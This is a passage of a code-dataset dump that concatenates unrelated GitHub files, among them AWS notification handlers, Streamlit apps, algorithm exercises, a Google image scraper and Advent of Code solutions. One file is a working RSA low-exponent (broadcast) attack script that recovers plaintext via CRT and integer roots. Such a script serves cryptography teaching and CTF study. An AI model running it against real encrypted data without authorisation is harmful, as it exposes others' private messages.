:\n            send_sms(item)\n        else:\n            send_email(item)\n        \n    #set a check notification status point 5 mins in the future for acknowledgment\n    #FIXME remove hard coding\n    time_In_Future_By_5_mins = datetime_to_isostr(datetime.utcnow() + timedelta(minutes = 5))\n\n    return {\n        'to_execute':'true',\n        'reminder_id':item['reminder_id'],\n        'notify_date_time':time_In_Future_By_5_mins\n    }\n\ndef send_sms(item):\n    #Send SMS\n    response = sns.publish(PhoneNumber = item['notify_by']['phone_number'], Message=item['remind_msg'])\n    logging.info(response)\n    return {\n        'statusCode': 200,\n        'body': json.dumps(response)\n    }\n\n\ndef send_email(item):\n    #Send Email\n    \n    #Provide the contents of the email.\n    response = ses.send_email(\n        Destination={\n            'ToAddresses': [\n                item['notify_by']['to_address'],\n            ],\n        },\n        Message={\n            'Body': {\n                'Text': {\n                    'Charset': CHARSET,\n                    'Data': item['remind_msg'],\n                },\n            },\n            'Subject': {\n                'Charset': CHARSET,\n                'Data': item['remind_msg'],\n            },\n        },\n        Source=item['notify_by']['from_address']\n    )\n    logging.info(response)\n    return {\n        'statusCode': 200,\n        'body': json.dumps(response)\n    }","repo_name":"ShailendVerma/aws-sam-reminder-app","sub_path":"reminder_app/execute_reminder_handler.py","file_name":"execute_reminder_handler.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"43992379174","text":"import filter\r\nimport streamlit as st\r\nimport base64\r\n\r\n\r\n\r\n\r\nst.title(\"Image Segmentation App\")\r\n\r\nimage_upload = st.file_uploader(\"Upload an image to perform image segmentation on!\", type=[\"png\", \"jpg\", \"jpeg\"])\r\nbtn_slot = st.empty() # Create empty slot for conditional button\r\n\r\nwith st.sidebar:\r\n    st.title(\"How to Use\")\r\n    st.text(\"1. Upload an image.\")\r\n    st.text(\"2. Click the 'Apply Image Segmentation' button.\")\r\n    st.text(\"3. Enjoy your segmented image!\")\r\n    file_ = open(\"instructions.gif\", \"rb\")\r\n    contents = file_.read()\r\n    data_url = base64.b64encode(contents).decode(\"utf-8\")\r\n    file_.close()\r\n\r\n    st.markdown(\r\n        f'<img src=\"data:image/gif;base64,{data_url}\" alt=\"cat gif\">',\r\n        unsafe_allow_html=True,\r\n    )\r\n\r\n\r\n# Display original image and segmented image only after source image upload\r\nif image_upload:\r\n    col_left, col_right = st.columns(2)\r\n\r\n    image = None\r\n    show_segmented = False\r\n\r\n    with col_left:\r\n        st.subheader(\"Original image\")\r\n\r\n        if image_upload is not None:\r\n            image = image_upload\r\n\r\n        st.image(image_upload, use_column_width=True)\r\n\r\n        if btn_slot.button('Apply Image Segmentation'):\r\n            show_segmented = True\r\n        \r\n        \r\n    with col_right:\r\n        st.subheader(\"Segmented Image\")\r\n\r\n        if show_segmented:\r\n            new_image = filter.image_segmentation(image)\r\n            \r\n            if new_image is not None:\r\n                st.image(new_image, use_column_width=True)\r\n                \r\nfooter=\"\"\"\r\n<div style=\"text-align: center;\">\r\n<p>Developed by Cruz, Fernandez, Posadas, Saquilayan</p>\r\n</div>
    \r\n\"\"\"\r\nst.markdown(footer,unsafe_allow_html=True)","repo_name":"ethansaqui/image-segmentation-web-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33760181458","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020-10-12 10:29\n @Author : QDY\n @FileName: 530. 二叉搜索树的最小绝对差.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给你一棵所有节点为非负值的二叉搜索树,请你计算树中任意两节点的差的绝对值的最小值。\n\n示例:\n\n输入:\n\n 1\n \\\n 3\n /\n 2\n\n输出:\n1\n\n解释:\n最小绝对差为 1,其中 2 和 1 的差的绝对值为 1(或者 2 和 3)。\n \n提示:\n树中至少有 2 个节点。\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n\n def getMinimumDifference(self, root: TreeNode) -> int:\n stack, cur, res, prev = [], root, float('inf'), -float('inf')\n while stack or cur:\n if cur:\n stack.append(cur)\n cur = cur.left\n else:\n cur = stack.pop()\n res = min(cur.val - prev, res)\n prev = cur.val\n cur = cur.right\n return res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/530. 二叉搜索树的最小绝对差.py","file_name":"530. 二叉搜索树的最小绝对差.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11619676403","text":"import sys\r\nfrom collections import deque\r\nN, K = map(int, input().split())\r\nA = [0] + [int(sys.stdin.readline()) for _ in range(N)]\r\nQ = deque()\r\nQ.append((0, 0))\r\n\r\nfor i in range(1, N + 1):\r\n if i - Q[0][1] - 1 > K:\r\n Q.popleft()\r\n \r\n dp = Q[0][0] + A[i]\r\n \r\n while len(Q) > 0 and dp <= Q[-1][0]:\r\n Q.pop()\r\n Q.append((dp, i))\r\n\r\nans = 0\r\ns = sum(A)\r\nwhile len(Q) > 0:\r\n u = Q.popleft()\r\n if u[1] >= N - K:\r\n ans = max(ans, s - u[0])\r\nprint(ans)","repo_name":"KongUm/BOJ","sub_path":"백준/Platinum/5977. Mowing the Lawn/Mowing the Lawn.py","file_name":"Mowing the Lawn.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38397378242","text":"import sys\nimport os\nimport numpy as np\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.patches import Circle\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import art3d\n\ndef rotation_matrix(v1,v2):\n \"\"\"\n Calculates the rotation matrix that changes v1 into v2.\n Borrowed from stack overflow\n \"\"\"\n v1/=np.linalg.norm(v1)\n v2/=np.linalg.norm(v2)\n\n cos_angle=np.dot(v1,v2)\n d=np.cross(v1,v2)\n sin_angle=np.linalg.norm(d)\n\n if sin_angle == 0:\n M = np.identity(3) if cos_angle>0. 
else -np.identity(3)\n else:\n d/=sin_angle\n\n eye = np.eye(3)\n ddt = np.outer(d, d)\n skew = np.array([[ 0 , d[2], -d[1]],\n [-d[2], 0 , d[0]],\n [ d[1], -d[0], 0 ]], dtype=np.float64)\n\n M = ddt + cos_angle * (eye - ddt) + sin_angle * skew\n\n return M\n \n\nclass ConstructMilestones3D:\n \n def __init__(self, path):\n \"\"\"\n \n \"\"\"\n self.path = path\n #self.ml_length= ml_length\n \n \n def GetVectors(self):\n \"\"\"\n Simply get vector components\n \"\"\"\n fp = self.path\n n_rows, n_cols = fp.shape[0], fp.shape[1]\n right = fp[1:n_rows]\n left = fp[0:n_rows-1]\n dr = right - left\n dr = np.vstack((dr,dr[-1])) \n \n return dr\n \n def GetAngles(self):\n \"\"\"\n Simply get angles (theta, phi -- spherical coordinate sys)\n \"\"\"\n dr = self.GetVectors()\n r = np.sqrt((dr*dr).sum(axis=1))\n angs = np.zeros(shape=(dr.shape[0],2))\n angs[:,0] = np.arccos(dr[:,2] / r)\n angs[:,1] = np.arcsin( dr[:,1] / np.sqrt(dr[:,0]*dr[:,0] + dr[:,1]*dr[:,1]))\n\n return angs\n\n \n def OptAngles(self, angles, n_iter=100, lr=0.01):\n \"\"\"\n Angles are optimized by taking average over neirest\n neihbours - 'Mean field approximation'. Vectorized version! \n \n \"\"\"\n alpha = np.pad(angles, ((1, 1),(0, 0)), 'edge')\n m = alpha.shape[0] # paded n_rows\n \n for iter in range(n_iter): \n alpha_mean = 0.5*(alpha[0:m-2] + alpha[2:m])\n dalpha = -alpha[1:m-1] + alpha_mean \n alpha[1:m-1] += lr*dalpha\n \n return alpha[1:m-1] # removed pads\n \n \n def OptVectors(self, vecs, n_iter=100, lr=0.01):\n \"\"\"\n Vectors along the path are optimized by taking average over neirest\n neihbours - 'Mean field approximation'. Vectorized version! \n This is better since angles have periodicity problem!\n \n \"\"\"\n\n vec = np.pad(vecs, ((1, 1),(0, 0)), 'edge')\n m = vec.shape[0] # paded n_rows\n \n for iter in range(n_iter): \n vec_mean = 0.5*(vec[0:m-2] + vec[2:m])\n dvec = -vec[1:m-1] + vec_mean \n vec[1:m-1] += lr*dvec\n \n #set flexible boundary\n vec[0] = vec[1] \n vec[m-1] = vec[m-2]\n \n #vec_mean = (vec[0:m-2] + vec[1:m-1] + vec[2:m] ) / 3.0\n #dvec = -vec[1:m-1] + vec_mean \n #vec[1:m-1] += lr*dvec\n\n return vec[1:m-1] # removed pads\n \n \n \n def Angles2UnitVecs(self, angles):\n \"\"\" \n \n \"\"\"\n U, V, W = np.sin(angles[:,0])*np.cos(angles[:,1]), \\\n np.sin(angles[:,0])*np.sin(angles[:,1]), \\\n np.cos(angles[:,0])\n \n return np.column_stack([U, V, W])\n \n \n def OptAngles1(self, angles, n_iter=100, lr=0.01):\n \"\"\"\n Angles are adjusted based on neirest neihbours.\n This is non-optimal fn \n \n \"\"\"\n pad = 1\n theta = np.copy(angles[0])\n phi = np.copy(angles[1])\n \n theta = np.pad(theta, (pad, pad), 'edge')\n phi = np.pad(phi, (pad, pad), 'edge')\n \n for iter in range(n_iter): \n for i in range(1, len(theta) - 1):\n thetamean = 0.5*(theta[i-1] + theta[i+1])\n phimean = 0.5*(phi[i-1] + phi[i+1])\n \n dtheta = -theta[i] + thetamean # modify\n dphi = -phi[i] + phimean\n \n theta[i] += lr*dtheta\n phi[i] += lr*dphi \n \n return theta[1:len(theta)-1], phi[1:len(phi)-1]\n \n \n\n\nclass SortFrames:\n \n def __init__(self, dat, dz):\n \"\"\"\n \n \"\"\"\n self.dat = dat\n self.dz = dz\n \n \n def SelFrames(self, ml_xyz, M, dr):\n \"\"\"\n Selects frames on a disk surface (both side) based on distances:\n dz - along disk normal\n dr - along radial direction\n \n \"\"\"\n data = np.copy(self.dat) - ml_xyz # translate\n a = np.dot(data, M) # rotate\n a = a*a; dz = self.dz*self.dz; dr = dr*dr # square \n mask = (a[:,2] <= dz) & (a[:,1] + a[:,0] <= dr)\n indxs = np.where(mask)[0]\n\n return 
indxs\n\n def SelCells(self, ml_xyzL, ml_xyzM, ml_xyzR, dr, Ml, Mm, Mr):\n \"\"\"\n Selects frames between two neighbouring milestone planes\n (aligned to milestone disk) and also sorts based on middle disk raduis:\n dz - along disk normal\n dr - along radial direction\n \n \"\"\"\n dataL = np.copy(self.dat) - ml_xyzL # translate left disk and dat with it\n aL = np.dot(dataL, Ml) # rotate\n \n dataM = np.copy(self.dat) - ml_xyzL \n aM = np.dot(dataM, Mm) \n \n dataR = np.copy(self.dat) - ml_xyzR # translate ...\n aR = np.dot(dataR, Mr) # rotate\n \n maskZ = (aL[:,2] >= 0.0) & (aR[:,2] < 0.0) # choose all points between plances \n maskR = aM[:,0]**2 + aM[:,1]**2 <= dr**2 # choose points within mid disk dr\n mask = maskZ * maskR # combine masks \n \n indxs = np.where(mask)[0]\n \n return indxs\n \n def SortAllPoints(self, normals, normalsMid, dr, pathP, pathMid, SortMethod='surface'):\n \"\"\"\n\n \"\"\"\n\n n_disks = normals.shape[0]\n n_cells = normalsMid.shape[0]\n z_hat = (0, 0, 1) # unit vecor along z\n datS = np.zeros((1,5)) # empty df for appending\n\n nf = self.dat.shape[0] \n CellIndx = np.ones(nf, dtype=int)*1000 # Index assigned to regions outside of the cells\n\n\n if SortMethod == 'surface':\n for i in range(n_disks):\n M = rotation_matrix(normals[i], z_hat) \n frame_ids = self.SelFrames(pathP[i], M, dr[i])\n diskID = np.ones_like(frame_ids, dtype=int)*i\n datS = np.append(datS, np.column_stack((self.dat[frame_ids], diskID, frame_ids)), axis=0)\n datS = datS[1:]\n\n elif SortMethod == 'middle':\n for i in range(n_cells):\n Ml = rotation_matrix(normals[i], z_hat) \n Mm = rotation_matrix(normalsMid[i], z_hat)\n Mr = rotation_matrix(normals[i+1], z_hat)\n frame_ids = self.SelCells(pathP[i], pathMid[i], pathP[i+1], dr[i], Ml, Mm, Mr)\n midIDs = np.ones_like(frame_ids, dtype=int)*i\n datS = np.append(datS, np.column_stack((self.dat[frame_ids], midIDs, frame_ids)), axis=0)\n CellIndx[frame_ids] = i\n\n datS = datS[1:]\n\n else:\n print('Specify one of the available methods to sort data points!')\n\n return datS, CellIndx\n\n\n\n\n \nif __name__=='__main__':\n \n from Utils import Generate3Data, Generate2Data, pathpatch_2d_to_3d\n from BKit import BuildSmoothMeanPath \n from BKit import InterpolatePath\n\n plot2D = True\n w_size = 100\n stride = 20\n n_points = 500\n dr = .8\n alpha = .5\n fs = 12 \n \n if plot2D:\n dat = Generate2Data(n_points)\n else:\n dat = Generate3Data(n_points)\n \n ReactPath = BuildSmoothMeanPath(dat, w_size=w_size, stride=stride) \n points = ReactPath.GetPath()\n \n ConsMile = ConstructMilestones3D(points)\n vecs = ConsMile.GetVectors()\n normals = ConsMile.OptVectors(vecs, n_iter=1000, lr=0.01)\n\n n_disks = normals.shape[0]\n rad = np.ones(n_disks)*dr\n \n fig = plt.figure(figsize = [8,6])\n \n if plot2D:\n plt.plot(dat[:,0], dat[:,1], ls = '', marker = 'o', markersize = 4)\n plt.plot(points[:,0], points[:,1], ls = '-', marker = 'o', markersize = 4)\n \n plt.xlabel(\"PC1\"); plt.ylabel(\"PC2\")\n plt.show()\n \n else:\n \n ax = plt.axes(projection='3d')\n p = ax.scatter3D(dat[:,0], dat[:,1], dat[:,2], c = range(int(len(dat))), alpha=0.2)\n ax.plot3D(points[:,0], points[:,1], points[:,2], 'red', marker='o')\n \n for i in range(n_disks):\n c = Circle((0,0), rad[i], facecolor='grey', alpha=alpha)\n ax.add_patch(c)\n pathpatch_2d_to_3d(c, points[i], normal = normals[i])\n \n ax.set_xlabel('PC1'); ax.set_ylabel('PC2'); ax.set_zlabel('PC3') \n fig.colorbar(p, ax=ax)\n plt.show()\n \n \n 
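    # Illustrative addition, not part of the original BKiT script: a quick sanity\n    # check of rotation_matrix() under the row-vector convention a = np.dot(data, M)\n    # used by SortFrames above; it needs only numpy, which is already imported.\n    # np.copy protects the inputs, since rotation_matrix() normalizes them in place.\n    v_from = np.array([1.0, 0.0, 0.0])\n    v_to = np.array([0.0, 0.0, 1.0])\n    R = rotation_matrix(np.copy(v_from), np.copy(v_to))\n    print('rotation sanity check:', np.allclose(np.dot(v_from, R), v_to))\n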
","repo_name":"chang-group/BKiT","sub_path":"BKit/ConstructMilestones3D.py","file_name":"ConstructMilestones3D.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"16276125583","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/3/29 下午9:36\n# @Author : lizheng\n# @FileName: demo2.py.py\n# @Software: PyCharm\nimport numpy as np\n\nimport cv2\n\nfrom matplotlib import pyplot as plt\n\n# 随机生成两组数值\n\n# xiaomi组,长和宽都在[0,20]内\n\nxiaomi=np.random.randint(0,20,(30,2))\n#dami组,长和宽的大小都在[40,60]\n\ndami=np.random.randint(40,60,(30,2))\n\n# 组合数据\n\nMI=np.vstack((xiaomi,dami))\n\n# 转换为float32类型\n\nMI=np.float32(MI)\n\n# 调用kmeans模块\n\n# 设置参数criteria值\n\ncriteria=(cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER,10,1.0)\n\n# 调用kmeans函数\n\nret,label,center=cv2.kmeans(MI,2,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n\n'''\n\n#打印返回值\n\nprint(ret)\n\nprint(label)\n\nprint(center)\n\n'''\n\n# 根据kmeans的处理结果,将数据分类,分为XM和DM两大类\n\nXM=MI[label.ravel()==0]\n\nDM=MI[label.ravel()==1]\n\n# 绘制分类结果数据及中心点\n\nplt.scatter(XM[:,0],XM[:,1],c='g',marker='s')\n\nplt.scatter(DM[:,0],DM[:,1],c='r',marker='o')\n\nplt.scatter(center[0,0],center[0,1],s=200,c='b',marker='o')\n\nplt.scatter(center[1,0],center[1,1],s=200,c='b',marker='s')\n\nplt.xlabel('Height'),plt.ylabel('Width')\n\nplt.show()","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter22/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18707358495","text":"#!/usr/bin/env python3\n\n\"\"\"\nTool to perform the low exponent attack against RSA.\n\nIf the public exponent e is sufficiently small and\none obtained e times the ciphertext of a fixed message\nalong with the differing moduli, the plaintext can be\nrecovered.\n\"\"\"\n\nimport argparse\nfrom functools import reduce\nfrom operator import mul\nimport sys\n\nimport gmpy2\n\n\ndef xgcd(b, n):\n \"\"\"\n Extended Euclidean Algorithm\n \"\"\"\n\n x0, x1, y0, y1 = 1, 0, 0, 1\n while n != 0:\n q, b, n = b // n, n, b % n\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return b, x0, y0\n\n\ndef crt(moduli, x_list):\n \"\"\"\n Chinese Remainder Theorem\n \"\"\"\n\n modulus = reduce(mul, moduli, 1)\n multipliers = []\n for m in moduli:\n M = modulus // m\n _, inverse, _ = xgcd(M, m)\n multipliers.append((inverse * M) % modulus)\n result = 0\n for multi, x in zip(multipliers, x_list):\n result = (result + multi * x) % modulus\n return result\n\n\ndef low_exponent_attack(moduli, ciphertexts):\n \"\"\"\n Low Exponent Attack against RSA\n \"\"\"\n\n c = crt(moduli, ciphertexts)\n root, _ = gmpy2.iroot(c, len(rsa_moduli))\n return int(root)\n\n\ndef parse_file(filename, input_base):\n \"\"\"\n Parse input file containing moduli or ciphertexts and return a list of them\n \"\"\"\n\n content = []\n with open(filename, encoding=\"utf-8\") as f:\n for line in f:\n if line.strip():\n content.append(int(line, input_base))\n if len(set(content)) != len(content):\n print(f\"Error: {filename} contains some duplicates, this won't work!\", file=sys.stderr)\n sys.exit(1)\n return content\n\n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser(description=\"Perform low exponent attack against RSA.\")\n argparser.add_argument(\"moduli\", help=\"file containing the used RSA moduli one per line\")\n argparser.add_argument(\"ciphertexts\", help=\"file containing the ciphertexts 
one per line\")\n argparser.add_argument(\"--hex\", dest=\"base\", action=\"store_const\", const=16, default=10, help=\"data in input files is hex encoded\")\n args = argparser.parse_args()\n\n rsa_moduli = parse_file(args.moduli, args.base)\n rsa_ciphertexts = parse_file(args.ciphertexts, args.base)\n\n plain_int = low_exponent_attack(rsa_moduli, rsa_ciphertexts)\n print(\"Plaintext (integer):\")\n print(plain_int)\n\n plain_hex = hex(plain_int)[2:]\n print(\"Plaintext (hex):\")\n print(plain_hex)\n\n plain_bytes = bytes.fromhex(plain_hex)\n plain_utf8 = plain_bytes.decode('utf-8')\n print(\"Plaintext (utf-8):\")\n print(plain_utf8)\n","repo_name":"exploide/securitools","sub_path":"crypto/rsa_low_exponent_attack.py","file_name":"rsa_low_exponent_attack.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"33641622485","text":"import re\r\n\r\ndef is_possible(x, y):\r\n for sx, sy, d in sensors:\r\n if manhattan_dist((sx, sy), (x, y)) <= d and (x, y) not in beacons:\r\n return False\r\n\r\n return True\r\n\r\ndef manhattan_dist(a: tuple, b: tuple) -> int:\r\n return (abs(a[0] - b[0]) + abs(a[1] - b[1]))\r\n\r\ndef part1(j: int):\r\n count = 0\r\n lower = min(x - d for x, _, d in sensors)\r\n upper = max(x +d for x, _, d in sensors)\r\n\r\n for i in range(lower, upper):\r\n if not is_possible(i, j) and (i, j) not in beacons:\r\n count += 1\r\n\r\n return count\r\n\r\nwith open('input.txt', 'r') as f:\r\n lines = [[int(y) for y in z] for z in [re.findall(r'\\w+\\=([\\-]?\\d+)', x) for x in f.readlines()]]\r\n\r\nsensors = set()\r\nsensors2 = set()\r\nbeacons = set()\r\nradius = {(a, b): manhattan_dist((a, b), (c, d)) for (a, b, c, d) in lines}\r\n\r\nfor line in lines:\r\n sx, sy = line[0], line[1]\r\n bx, by = line[2], line[3]\r\n\r\n d = manhattan_dist((sx, sy), (bx, by))\r\n\r\n sensors.add((sx, sy, d))\r\n sensors2.add((sx, sy))\r\n beacons.add((bx, by))\r\n\r\nprint(part1(2000000))\r\n\r\nacoeffs, bcoeffs = set(), set()\r\n\r\nfor (x, y), r in radius.items():\r\n acoeffs.add(y - x + r + 1)\r\n acoeffs.add(y - x - r - 1)\r\n bcoeffs.add(x + y + r + 1)\r\n bcoeffs.add(x + y - r - 1)\r\n\r\nubound = 4000000\r\n\r\nfor a in acoeffs:\r\n for b in bcoeffs:\r\n point = ((b - a) // 2, (a + b) // 2)\r\n if all(0 < coordinate < ubound for coordinate in point):\r\n if all(manhattan_dist(point, center) > radius[center] for center in radius.keys()):\r\n print(4000000 * point[0] + point[1])\r\n\r\n","repo_name":"tiitinha/adventofcode","sub_path":"AoC22/day15/python/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23025351787","text":"\nfrom selenium import webdriver\nimport base64\nfrom selenium.webdriver.common.by import By\nimport requests\nimport io\nfrom PIL import Image\nimport time\nimport os\n# wd = webdriver.Firefox()\n\nclass scrapping_image_from_google:\n\n\tdef get_images_url_from_google(wd, delay, max_images,search_query):\n\n\t\tdef scroll_down(wd):\n\t\t\tif max_images<400:\n\t\t\t\twd.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\t\ttime.sleep(delay)\n\t\t\telse:\n\t\t\t\tlast_height = wd.execute_script('return document.body.scrollHeight')\n\t\t\t\twhile True:\n\t\t\t\t\twd.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n\t\t\t\t\ttime.sleep(delay)\t\n\t\t\t\t\tnew_height = wd.execute_script('return 
document.body.scrollHeight')\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\telement = wd.find_element(By.XPATH, \"//input[@value='Show more results']\")\n\n\n\t\t\t\t\t\telement.click()\n\t\t\t\t\t\ttime.sleep(delay)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\t\tif new_height == last_height:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tlast_height = new_height\n\n\t\turl = f\"https://www.google.com/search?q={search_query}&tbm=isch\"\n\t\twd.get(url)\n\n\t\timage_urls = set()\n\t\tskips = 0\n\t\tscroll_down(wd)\n\n\t\tthumbnails = wd.find_elements(By.CLASS_NAME, \"Q4LuWd\")\n\n\t\twhile len(image_urls) + skips < max_images:\n\t\t\t\n\t\t\tfor img in thumbnails[len(image_urls) + skips:max_images]:\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\timg.click()\n\t\t\t\t\ttime.sleep(delay)\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\n\t\t\t\timages = wd.find_elements(By.CLASS_NAME, \"r48jcc\")\n\t\t\t\tfor image in images:\n\t\t\t\t\tif image.get_attribute('src') in image_urls:\n\t\t\t\t\t\tmax_images += 1\n\t\t\t\t\t\tskips += 1\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif image.get_attribute('src') and 'http' in image.get_attribute('src'):\n\t\t\t\t\t\timage_urls.add(image.get_attribute('src'))\n\t\t\t\t\t\tprint(f\"Found [{len(image_urls)}]\")\n\t\treturn image_urls\n\tdef download_image(download_path, urls, file_name):\n\t\tresult=[]\n\t\tmain_directory=f\"{download_path}/{file_name}\"\n\t\tos.makedirs(main_directory)\n\t\t\n\t\tfor i, url in enumerate(urls):\n\t\t\n\t\t\ttry:\n\t\t\t\timage_content = requests.get(url,allow_redirects=True,timeout=10).content\n\t\t\t\timage_file = io.BytesIO( image_content)\n\t\t\t\timage = Image.open(image_file)\n\t\t\t\tfile_path = f\"{main_directory}/{i+1}.jpeg\"\n\t\t\t\timage = image.convert('RGB')\n\n\t\t\t\twith open(file_path, \"wb\") as f:\n\t\t\t\t\timage.save(f, \"JPEG\")\n\n\t\t\t\tprint(f\"Success download[{i+1}] \")\n\t\t\t\tresult.append(file_path)\n\n\t\t\texcept Exception as e:\n\t\t\t\tprint('FAILED -', e)\n\t\treturn(result)\n\n\n\nif __name__=='__main__':\n\n\tobj=scrapping_image_from_google\n\turls = obj.get_images_url_from_google(wd, 3, 3,search_query=\"mountain\")\n\tobj.download_image(\"imgs/\", urls, \"mountain\")\n\twd.quit()","repo_name":"hosseinhj1380/google-image-scrapping","sub_path":"second-phase/scrapping.py","file_name":"scrapping.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"953737694","text":"def plusOne(digits):\n idx = len(digits) - 1\n digits[idx] += 1\n if digits[idx] != 10:\n return(digits)\n else:\n while(idx > 0 and digits[idx] == 10 ):\n digits[idx] = 0\n digits[idx-1] += 1\n idx -= 1\n if digits[0] == 10:\n digits[0] = 0\n digits.insert(0,1)\n return(digits)\n\nprint(plusOne([2,9,9,1,9]))\n\nclass Solution:\n def plusOne(self, A):\n num = 0\n exp = len(A) - 1\n for i in range(len(A)):\n num = num + (A[i] * (10 ** exp))\n exp -= 1\n num += 1\n num_list = self.conv_num_to_list(num)\n return(num_list)\n\n def conv_num_to_list(self,num):\n result = []\n while(num > 0):\n digit = num % 10\n result.insert(0,digit)\n num = num // 10\n return(result)\n\ns = Solution()\nres = s.plusOne([0,9])\nprint(res)","repo_name":"aparna-narasimhan/python_examples","sub_path":"Arrays/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19026701846","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 14 12:00:34 2020\n\n@author: Gary\n\nThis 
code is used to direct the process of making a static web site of\na disclosure catelog.\n\"\"\"\nimport core.Construct_set as const_set\n#import website_gen.web_gen as web_gen\nimport website_gen.API_web_gen as API_gen\n\ndata_date = '2021-03-05'\n\ntab_const = const_set.Construct_set(fromScratch=False).get_full_set()\n\nag = API_gen.API_web_gen(tab_man=tab_const,data_date=data_date)\nag.make_cluster_set()\n\nag.make_api_set()\n#ag.make_index_page()\n#apidf = ag.getAPIdf()","repo_name":"gwallison/open-FF","sub_path":"generate_disclosure_site.py","file_name":"generate_disclosure_site.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2559223939","text":"father = float(input(\"请输入父亲身高(米)\\n>>\"))\nmother = float(input(\"请输入母亲身高(米)\\n>>\"))\n\nson = ((father+mother)*1.08)/2\ndaughter = (father*0.923+mother)/2\n\ngender = str(input(\"请输入孩子的性别(男/女)\\n>>\"))\nif gender == \"男\":\n print(\"预测您儿子成年后的身高为\"+str(son)+\"米\")\nif gender == \"女\":\n print(\"预测您女儿成年后的身高为\"+str(daughter)+\"米\")\n\n# 程序作者 快速的飓风.\n# 于 2019.10.07\n# 严禁抄袭\n","repo_name":"Hurrieam/homework-csapp","sub_path":"Python作业/02/Work_2.2.py","file_name":"Work_2.2.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35323041863","text":"from keras.models import load_model\nimport pickle\nimport streamlit as st\nfrom streamlit_option_menu import option_menu\n\n## Load the models\n\ndiabetes_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/diabetesmodel.sav','rb'))\nheart_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/heart_disease_model.sav','rb'))\nparkinson_model=pickle.load(open('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/parkinsons_model.sav','rb'))\ncancer_model=load_model('/home/aditya/Desktop/AR/Multiple Disease Prediction/Diseases/Models/cancer.h5')\n\n#sidebar for navigation\nwith st.sidebar:\n selected=option_menu('Disease Prediction System',\n ['Predict Diabetes',\n 'Predict Heart Disease',\n 'Predict Parkinsons Disease',\n 'Predict Breast Cancer'],\n icons=['activity','heart','file-person-fill','journal-medical'],\n default_index=0)\n\n# Diabetes Prediction Page\nif (selected == 'Predict Diabetes'):\n # page title\n st.title('Diabetes Prediction using ML')\n \n # getting the input data from the user\n col1, col2, col3 = st.columns(3)\n with col1:\n Pregnancies = st.text_input('Number of Pregnancies') \n with col2:\n Glucose = st.text_input('Glucose Level')\n with col3:\n BloodPressure = st.text_input('Blood Pressure value')\n with col1:\n SkinThickness = st.text_input('Skin Thickness value')\n with col2:\n Insulin = st.text_input('Insulin Level')\n with col3:\n BMI = st.text_input('BMI value')\n with col1:\n DiabetesPedigreeFunction = st.text_input('Diabetes Pedigree Function value')\n with col2:\n Age = st.text_input('Age of the Person')\n \n # code for Prediction\n diab_diagnosis = ''\n # creating a button for Prediction\n if st.button('Diabetes Test Result'):\n diab_prediction = diabetes_model.predict([[Pregnancies, Glucose, BloodPressure, SkinThickness, Insulin, BMI, DiabetesPedigreeFunction, Age]])\n \n if (diab_prediction[0] == 1):\n diab_diagnosis = 'The person is diabetic'\n else:\n diab_diagnosis = 'The person is not diabetic' \n st.success(diab_diagnosis)\n\n\n# Heart Disease Prediction Page\nif 
